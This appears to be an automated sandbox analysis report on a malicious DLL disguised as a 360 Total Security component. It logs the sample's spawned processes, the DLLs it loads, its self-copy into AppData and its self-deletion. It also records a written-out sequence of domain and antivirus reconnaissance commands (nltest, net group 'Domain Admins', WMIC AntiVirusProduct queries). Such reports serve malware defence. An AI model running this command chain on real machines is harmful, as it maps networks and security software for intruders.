Source: rundll32.exe, 00000008.00000003.3366590989.000001E3B5885000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: rundll32.exe, 00000008.00000003.3370598400.000001E3B564C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3368999510.000001E3B5636000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3368999510.000001E3B5648000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 360total.dll.dll ReversingLabs: Detection: 18%
Source: unknown Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\360total.dll.dll"
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,CreateObject
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dll", #1
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6200 -s 456
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,homq
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1996,i,16797134848863919888,4031310649045437557,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,RegisterInstallTime
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6200 -s 456
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c ipconfig /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\systeminfo.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net view /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net config workstation
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c whoami /groups
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1 Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,CreateObject Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,homq Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,RegisterInstallTime Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dll", #1 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c ipconfig /all Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c systeminfo Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net view /all /domain Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net view /all Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net config workstation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c whoami /groups Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1996,i,16797134848863919888,4031310649045437557,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\loaddll64.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\ipconfig.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\ipconfig.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\ipconfig.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\ipconfig.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\ipconfig.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: esscli.dll
Source: C:\Windows\System32\nltest.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\nltest.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\nltest.exe Section loaded: netutils.dll
Source: C:\Windows\System32\nltest.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\nltest.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\nltest.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\nltest.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\nltest.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\nltest.exe Section loaded: netutils.dll
Source: C:\Windows\System32\nltest.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\nltest.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\nltest.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net.exe Section loaded: browcli.dll
Source: C:\Windows\System32\net.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net.exe Section loaded: browcli.dll
Source: C:\Windows\System32\net.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\net1.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: Slides.lnk.12.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.12.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Google Drive.lnk.12.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.12.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.12.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.12.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: 360total.dll.dll Static PE information: Image base 0x180000000 > 0x60000000
Source: 360total.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 360total.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 360total.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 360total.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 360total.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 360total.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 360total.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2007308735.00000237C3230000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2008448685.0000000180086000.00000002.00000001.01000000.00000000.sdmp, 360total.dll.dll, Update_27361bf8.dll.4.dr
Source: 360total.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 360total.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 360total.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 360total.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 360total.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800033E0 memset,memset,memset,memset,CreateFileW,GetFileInformationByHandle,ReadFile,ReadFile,CoTaskMemAlloc,ReadFile,CoTaskMemFree,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,PathRemoveFileSpecW,PathCombineW,PathRemoveFileSpecW,PathCombineW,free,??_U@YAPEAX_K@Z,ReadFile,ReadFile,SetFilePointer,ReadFile,ReadFile,ReadFile,ILFree,ReadFile,memset,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,CoTaskMemFree,GetLastError,FreeLibrary,CloseHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,SetLastError, 3_2_00000001800033E0
PE file contains an invalid checksum
Source: Update_27361bf8.dll.4.dr Static PE information: real checksum: 0xd8785 should be: 0xe745c
Source: 360total.dll.dll Static PE information: real checksum: 0xd8785 should be: 0xe745c
PE file contains sections with non-standard names
Source: 360total.dll.dll Static PE information: section name: wsgi2
Source: Update_27361bf8.dll.4.dr Static PE information: section name: wsgi2
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180010451 push rcx; ret 3_2_0000000180010452
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001045A push rcx; ret 3_2_000000018001045B
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001801758FC push rsp; ret 3_2_00000001801758FD
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180175CDE push 2027C70Fh; ret 3_2_0000000180175CE5

Persistence and Installation Behavior
barindex
Uses ipconfig to lookup or modify the Windows network settings
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Drops PE files
Source: C:\Windows\System32\rundll32.exe File created: C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dll Jump to dropped file

Boot Survival
barindex
Uses net.exe to modify the status of services
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net config workstation
Stores files to the Windows start menu directory
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk Jump to behavior
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle, 3_2_0000000180049AEC

Hooking and other Techniques for Hiding and Protection
barindex
Deletes itself after installation
Source: C:\Windows\System32\rundll32.exe File deleted: c:\users\user\desktop\360total.dll.dll Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180062148 memset,GetModuleFileNameW,PathCombineW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary, 3_2_0000000180062148
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
